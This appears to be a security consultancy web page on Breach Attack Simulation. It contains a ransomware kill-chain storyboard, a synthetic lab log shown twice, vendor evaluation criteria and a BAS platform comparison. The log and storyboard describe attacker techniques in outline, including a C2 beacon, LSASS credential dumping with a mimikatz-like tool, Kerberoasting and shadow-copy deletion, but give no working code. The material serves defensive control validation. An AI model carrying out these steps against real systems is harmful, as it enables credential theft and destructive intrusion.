// what is BAS
Most organisations assume their controls work.
BAS proves whether they do.
Breach Attack Simulation runs controlled, repeatable attack sequences against your actual security controls and measures what fires, what misses, and how long detection takes.
A firewall rule, an EDR policy, a SIEM detection rule, a DLP control. Each of these was configured correctly at some point. But environments change. Rules get tuned for noise. Policies get exceptions. Agents get excluded. The control you rely on may not behave the way you think it does when an attacker arrives.
Penetration testing answers "can someone get in?". Vulnerability scanning answers "what is misconfigured?". BAS answers the question both miss: if an attacker is already moving, what do your controls actually do?
A mature BAS capability runs continuously, maps findings directly to MITRE ATT&CK, produces evidence of control effectiveness across every surface, and generates actionable output for every stakeholder, from the SOC analyst tuning detection rules to the CISO presenting to the board.
// the question BAS answers
✗
Do we have endpoint protection deployed?
→
If an attacker dumps LSASS, does our EDR fire and does the SOC get a signal they can act on?
✗
Do we have network segmentation?
→
If an attacker moves east-west from a compromised workstation, how far do they get before anything fires?
✗
Do we have DLP controls?
→
If an insider compresses sensitive files into an encrypted archive and uploads to personal cloud storage, does DLP catch it?
// simulation storyboard · scenario 01
The 4am call.
A ransomware kill chain, step by step.
This is what a full Ransomware Kill Chain simulation looks like inside a mature BAS platform. Every step maps to a real MITRE ATT&CK technique. Every gap maps to a real remediation action. This scenario is available to run interactively in the demonstration platform below.
🎯
Day −30 · Reconnaissance
The attacker was watching before you knew they existed.
A threat actor modelled on FIN7 spends three weeks doing passive reconnaissance. LinkedIn profiles of your IT helpdesk staff. MX record enumeration. Job postings that reveal your EDR vendor. None of this triggers a single alert in your environment.
T1589 Identity Info GatheringT1596 Open Technical Databases
BAS approach: No simulation action at this phase. A mature BAS platform documents the OSINT surface your organisation exposes and uses it to build the scenario brief.
📧
T+00:00 · Initial Access
A phishing email lands. One person opens it.
A macro-enabled XLSX labelled "Q3 Salary Review: Action Required" is delivered to three seed accounts: HR, Finance, and IT Helpdesk. The simulation records whether your email gateway quarantines it, whether the sandbox detonates the attachment, and whether user simulation triggers the macro.
T1566.001 Spearphishing AttachmentT1204.002 Malicious File
Gap found in 68% of simulations: Email sandbox fires on the attachment, but the alert is auto-closed as low priority by a SOAR playbook misconfigured six months earlier. The macro executes.
⚡
T+04:13 · Execution
PowerShell fires. A beacon phones home.
The VBA macro drops an encoded PowerShell cradle. In 8 seconds it decodes, executes in-memory, and establishes an HTTPS beacon to the C2 lab node over port 443. The traffic is indistinguishable from normal web browsing to a proxy without TLS inspection and behavioural baselining.
T1059.001 PowerShellT1055.001 Process Injection
EDR fires at T+09m: Script-block logging catches the encoded payload. Alert raised, but the on-call analyst is triaging a separate P2 incident. The alert ages 22 minutes before acknowledgement.
🔑
T+14:27 · Credential Access
LSASS. The single most common technique in enterprise ransomware chains.
With a foothold established, the simulation attempts LSASS memory access. On hosts without Credential Guard, this yields NTLM hashes and Kerberos tickets in under 90 seconds. This is the pivotal moment in the kill chain: catch it here and the attack ends. Miss it and everything downstream follows.
T1003.001 LSASS Memory DumpT1558.003 Kerberoasting
Critical gap: Credential Guard is not deployed on domain controllers. LSASS access succeeds. Estimated engineering effort to remediate: 4 hours. In a real attack, this is where the clock resets.
↔
T+31:00 · Lateral Movement
The attacker moves. Quietly. East-west through the estate.
Using harvested credentials, the simulation pivots to the file server via RDP, then enumerates the domain controller. Three additional workstations in the same subnet are reached via WMI. The NDR fires, but the detection threshold was raised six months ago to reduce alert volume.
T1021.001 Remote Desktop ProtocolT1047 WMI Execution
Detection gap: 18 minutes between first lateral move and NDR alert. In a real ransomware event, that is four additional hosts compromised and backup infrastructure reached.
💀
T+41:00 · Impact
4:17am. The call comes in.
Volume shadow copies deleted. 847 files encrypted with AES-256. Ransom note dropped to three shared directories. In the simulation, this is entirely synthetic. No real files are touched. In the real incident this scenario is modelled on, recovery took 19 days and cost £2.3M in downtime, forensics, and recovery. The controls that would have stopped it at T+14 minutes cost less than a day of engineering work to fix.
T1490 Inhibit System RecoveryT1486 Data Encrypted for Impact
Simulation result: 3 critical gaps identified. Detection coverage 68%. Mean time to detect: 22 minutes. Remediation roadmap generated. P1 fixes estimated at 6 hours of engineering work. Re-run in 30 days to validate.
[bas-agent] Scenario: Ransomware Kill Chain (S001) · FIN7 TTP profile
[bas-agent] Target: lab.internal · 192.168.10.0/24 · synthetic telemetry only
T+00:00 INFO Phishing lure delivered · HR-003@lab.internal · macro-enabled XLSX
T+04:13 WARN VBA macro executed · payload decoded in-memory · pid:3821 WIN-LAB-07
T+09:02 WARN PowerShell cradle · HTTPS beacon 192.168.200.10:443 established
T+14:27 CRIT LSASS memory access · mimikatz_sim.exe · EDR rule CRED-0041 FIRED
T+22:41 WARN Scheduled task 'WindowsUpdate' · persistence registered
T+24:00 CRIT Kerberoasting · 3 SVC account SPNs · hashes to C2
T+31:00 WARN RDP lateral · .14 to FS01 · harvested domain credentials
T+38:15 CRIT VSS deletion · WMI Win32_ShadowCopy.Delete() · WIN-LAB-07
T+41:00 CRIT File encryption · 847 synthetic files · .locked extension
─────────────────────────────────────────────────────
SIMULATION COMPLETE
Detection coverage: 68% (target: 90%)
Controls fired: 6 / 8
Mean time to detect: 22 minutes (target: <10m)
Critical gaps: 3 (LSASS, DLP, NDR threshold)
P1 remediation effort: ~6 hours
─────────────────────────────────────────────────────
Report: executive-summary.pdf · remediation-roadmap.csv
[bas-agent] Target: lab.internal · 192.168.10.0/24 · synthetic telemetry only
T+00:00 INFO Phishing lure delivered · HR-003@lab.internal · macro-enabled XLSX
T+04:13 WARN VBA macro executed · payload decoded in-memory · pid:3821 WIN-LAB-07
T+09:02 WARN PowerShell cradle · HTTPS beacon 192.168.200.10:443 established
T+14:27 CRIT LSASS memory access · mimikatz_sim.exe · EDR rule CRED-0041 FIRED
T+22:41 WARN Scheduled task 'WindowsUpdate' · persistence registered
T+24:00 CRIT Kerberoasting · 3 SVC account SPNs · hashes to C2
T+31:00 WARN RDP lateral · .14 to FS01 · harvested domain credentials
T+38:15 CRIT VSS deletion · WMI Win32_ShadowCopy.Delete() · WIN-LAB-07
T+41:00 CRIT File encryption · 847 synthetic files · .locked extension
─────────────────────────────────────────────────────
SIMULATION COMPLETE
Detection coverage: 68% (target: 90%)
Controls fired: 6 / 8
Mean time to detect: 22 minutes (target: <10m)
Critical gaps: 3 (LSASS, DLP, NDR threshold)
P1 remediation effort: ~6 hours
─────────────────────────────────────────────────────
Report: executive-summary.pdf · remediation-roadmap.csv
// vendor selection criteria
How to evaluate a BAS platform.
Six criteria that separate mature tools from marketing claims.
Enterprise BAS platforms vary significantly in depth, breadth, and operational maturity. These six criteria cut through the marketing and surface what actually matters for a sustained continuous validation programme.
Criterion 01
MITRE ATT&CK Coverage Depth
Coverage breadth matters less than coverage accuracy. A platform claiming 2,000 TTP simulations but with shallow detection validation is less valuable than one with 500 deeply validated techniques. Ask for evidence of technique execution fidelity, not just a tactic count.
How is technique execution validated against real EDR and SIEM responses?
Does the platform distinguish between execution and detection coverage?
How frequently are TTP libraries updated to match current threat intelligence?
Criterion 02
Integration Ecosystem
A BAS platform is only as useful as its ability to ingest and correlate signals from your existing security stack. Shallow integrations that push a report without bidirectional telemetry significantly limit operational value. Prioritise platforms with native SIEM, EDR, and SOAR integrations.
Does the platform integrate natively with your SIEM and EDR vendors?
Can it automatically correlate simulated attack telemetry against detection rule firing?
Does it support bidirectional SOAR integration for automated response testing?
Criterion 03
Cloud and Hybrid Environment Coverage
Most enterprise environments are hybrid. A BAS platform that only validates endpoint and network controls misses a significant portion of the modern attack surface. Cloud control-plane attacks, identity abuse, SaaS misconfigurations, and container escapes are now mainstream threat vectors.
Does the platform simulate AWS and Azure cloud-specific attack techniques?
Can it validate IAM abuse, storage exfiltration, and cloud identity attacks?
Does it cover Kubernetes and container runtime attack techniques?
Criterion 04
Reporting and Stakeholder Output
A BAS platform that only produces technical gap reports creates a translation burden for the security team. The best platforms generate outputs that different stakeholders can act on directly, from SOC tuning notes to board-level risk summaries, without manual report writing.
Does the platform generate executive-level risk summaries alongside technical reports?
Can it produce remediation roadmaps with effort estimates and priority ordering?
Does it track improvement over time and show trend data across simulation runs?
Criterion 05
Operational Safety and Production Risk
All enterprise BAS platforms claim zero production risk but the implementation quality varies significantly. Safe simulation depends on proper agent design, execution sandboxing, rollback capabilities, and clear documentation of what each technique does and does not do in a production environment.
Is the simulation agent isolated from production processes and data?
Can individual techniques be scoped and excluded for sensitive environments?
What happens if the agent is deployed in an environment with active incident response?
Criterion 06
Deployment and Time to Value
Enterprise BAS platforms have historically required significant deployment effort and professional services engagement before delivering value. The best modern platforms reduce this dramatically. Time to first meaningful simulation result is a direct indicator of operational maturity.
What is the realistic deployment timeline from procurement to first simulation?
What professional services overhead is required to operationalise the platform?
Can the platform run in an existing lab environment before production deployment?
Enterprise BAS platform comparison.
An honest assessment of the leading enterprise BAS platforms against the six criteria above. All platforms are mature, credible options. The right choice depends on your environment, integration requirements, and team maturity.
| Criterion | Cymulate | Picus Security | AttackIQ | SafeBreach | XM Cyber |
|---|---|---|---|---|---|
| MITRE ATT&CK coverage depth | Strong 1500+ techniques, frequent updates | Strong Picus Threat Library, weekly updates | Strong MITRE-aligned, community content | Strong Hacker's Playbook library | Different approach: attack path focus |
| Integration ecosystem | Broad 100+ integrations, bidirectional SIEM | Strong Picus Complete Security Validation | Strong open platform, API-first | Good major SIEM/EDR vendors covered | Strong graph-based platform integrations |
| Cloud and hybrid coverage | AWS, Azure, GCP, SaaS, identity | Primarily endpoint and network focus | Cloud scenarios via community content | Growing cloud coverage | Cloud-native, attack path to cloud assets |
| Multi-stakeholder reporting | Executive, technical, and board-ready outputs | Technical-focused, some executive reporting | Technical-focused, requires customisation | Technical reports, some risk dashboards | Risk-based, business context built in |
| Production safety | Safe simulation, no production impact | Safe simulation, proven enterprise deployments | Safe simulation, CALDERA-based scenarios | Safe simulation, simulator-based | Agentless attack path analysis |
| Time to value | Rapid deployment, strong onboarding | Professional services typically required | Platform setup requires effort | Deployment overhead before first simulation | Relatively fast, agentless reduces friction |
| Best suited for | Broad enterprise BAS programmes needing fast deployment and wide coverage | Organisations prioritising detection validation and SOC improvement | Organisations wanting an open, community-driven platform | Organisations focused on attack simulation breadth | Organisations prioritising attack path and exposure management |
Note: This comparison is based on publicly available information and professional assessment. Platform capabilities evolve rapidly. Always validate against your specific environment requirements during a proof of concept engagement.
// what mature BAS delivers
Six things a mature BAS programme
should produce for your organisation.
Regardless of which platform you select, these are the operational outcomes a mature Breach Attack Simulation capability should be delivering within six months of deployment.
Outcome 01
Continuous, evidence-based control validation
Every major control including EDR, SIEM, DLP, NDR, and cloud security services, validated against realistic attacker behaviour on a continuous cycle, not an annual assessment. Evidence produced after every run.
Outcome 02
MITRE ATT&CK coverage mapped to your environment
A live view of which ATT&CK tactics and techniques your controls detect, which they miss, and how coverage changes over time. Prioritised by threat actor relevance to your sector and technology stack.
Outcome 03
Quantified detection and response metrics
Mean Time to Detect and Mean Time to Respond measured against realistic attack sequences, not synthetic availability metrics. Tracked over time and tied to specific control improvements.
Outcome 04
Prioritised remediation with effort estimates
Control gaps ranked by exploitability, blast radius, and remediation effort. Not a list of findings but a prioritised programme of work with owner assignment and validation criteria built in.
Outcome 05
Board and executive-level risk visibility
Security posture translated into business risk language. Exposure score, compliance coverage, and trend data that a CISO can present to the board without a six-week reporting cycle or a consultant to interpret it.
Outcome 06
Validated control effectiveness after every change
Every significant architecture change, infrastructure deployment, or security control update validated against relevant attack scenarios. Configuration drift detected and evidenced before the next incident, not discovered during one.
// who this is for
One simulation.
Five different conversations.
The same BAS run produces different signal for every person who needs to act on it. The demonstration platform below shows what each persona receives from a single simulation run.
CISO / CIO
Executive · Board Reporting
"If we were hit tomorrow, how far would they get and what would it cost us?"
Exposure score, detection coverage percentage, compliance posture across NIST, ISO 27001, and DORA, and a one-page board-ready summary, generated from the same test the SOC analyst just ran.
SOC Analyst
Detection · Response · Triage
"Which rules fired, which missed, and what do I tune first?"
Step-by-step event log with timestamps, alert correlation, detection rule performance table, and specific SIEM and EDR tuning recommendations per gap identified.
Security Architect
Architecture · Controls · Integration
"Where are the actual holes in our control architecture across each layer?"
Attack surface map by technology layer, integration health, east-west segmentation gaps, and per-surface coverage scores across endpoint, cloud, identity, network, and email.
Project Manager
Delivery · Remediation · Sprints
"What do we fix, in what order, who owns it, and how long does it take?"
Prioritised remediation roadmap with effort estimates, owner assignment template, 90-day sprint structure, and risk-reduction percentage per fix, ready for any project tracking tool.
Developer / DevSecOps
Pipeline · WAF · Hardening
"How does our application and pipeline hold up against WAF bypass and web app attacks?"
WAF coverage scoring, OWASP Top 10 results, deserialisation and path traversal findings, and hardening recommendations mapped to your specific stack and runtime environment.
GRC / Compliance
Audit · Frameworks · Evidence
"Can we evidence our controls to an auditor without a year-long pen test cycle?"
Control-by-control evidence mapping against NIST CSF 2.0, ISO 27001:2022, CIS Controls v8, SOC 2 Type II, and DORA with pass, partial, and fail breakdown and trend history.
// demonstration scenarios
Six attack chains.
Every surface covered.
The interactive demonstration below includes six scenarios mapped to real-world threat actor profiles using documented MITRE ATT&CK TTPs. These represent the attack categories a mature BAS programme should validate continuously.
Endpoint
Ransomware Kill Chain
Full LockBit 3.0-pattern kill chain from phishing delivery to file encryption. Tests EDR, backup integrity, LSASS protection, and lateral movement detection. Modelled on FIN7 TTPs.
T1566.001T1059.001T1003.001T1486
Cloud
Cloud Control-Plane Pivot
Credential stuffing against federated SSO, followed by IAM privilege abuse and S3 data exfiltration. Maps to AWS shared-responsibility model. Modelled on APT29 cloud TTPs.
T1078T1110.003T1098T1041
Identity
Active Directory Compromise
Kerberoasting through to DCSync and Golden Ticket forgery. Full AD kill chain testing identity plane resilience, PAM controls, and privileged access hard stops.
T1558.003T1003.001T1550.003
WAF / Web
WAF Bypass & Web Exploit
OWASP Top 10 simulation including SQL injection, path traversal, and deserialisation RCE. Unicode encoding WAF bypass technique. Produces a WAF coverage percentage score.
T1190T1059.007T1083
Network
Lateral Movement Chain
East-west movement simulation using PsExec, WMI, SMB, and SSH pivoting. Tests micro-segmentation effectiveness, NDR detection thresholds, and east-west firewall rule coverage.
T1021.002T1047T1570
Insider
Insider Threat Data Theft
Trusted user abusing legitimate access to exfiltrate sensitive data. DLP bypass via encrypted archives. UEBA detection validation across baseline deviation scoring.
T1562.001T1048T1078
// interactive demonstration
The methodology in practice.
Run it yourself.
The BreachForge demonstration platform is a working interactive implementation of the BAS methodology described on this page. It is not a commercial product. It is a technical demonstration built to show what this capability looks and feels like when properly designed and implemented.
Demonstration platform · synthetic telemetry only · no production risk
BreachForge BAS Demonstration
Run any of the six scenarios, explore the MITRE ATT&CK coverage heatmap, review threat actor profiles, generate multi-persona reports, and explore what a mature BAS operational interface should look like. All data is synthetic.
Simulations
6 attack scenarios across all major surfaces
MITRE Coverage
12-tactic heatmap with technique detail
Reports
Executive, SOC, architecture, and PM output
// working with organisations on BAS
Implementing BAS for your organisation.
Strategy, selection, and architecture.
Selecting and implementing a BAS platform is one decision. Designing the operating model, integration architecture, detection tuning workflow, and governance framework around it is a different and equally important one. If you are evaluating BAS vendors or designing a continuous validation programme, connect to discuss the architecture and implementation approach.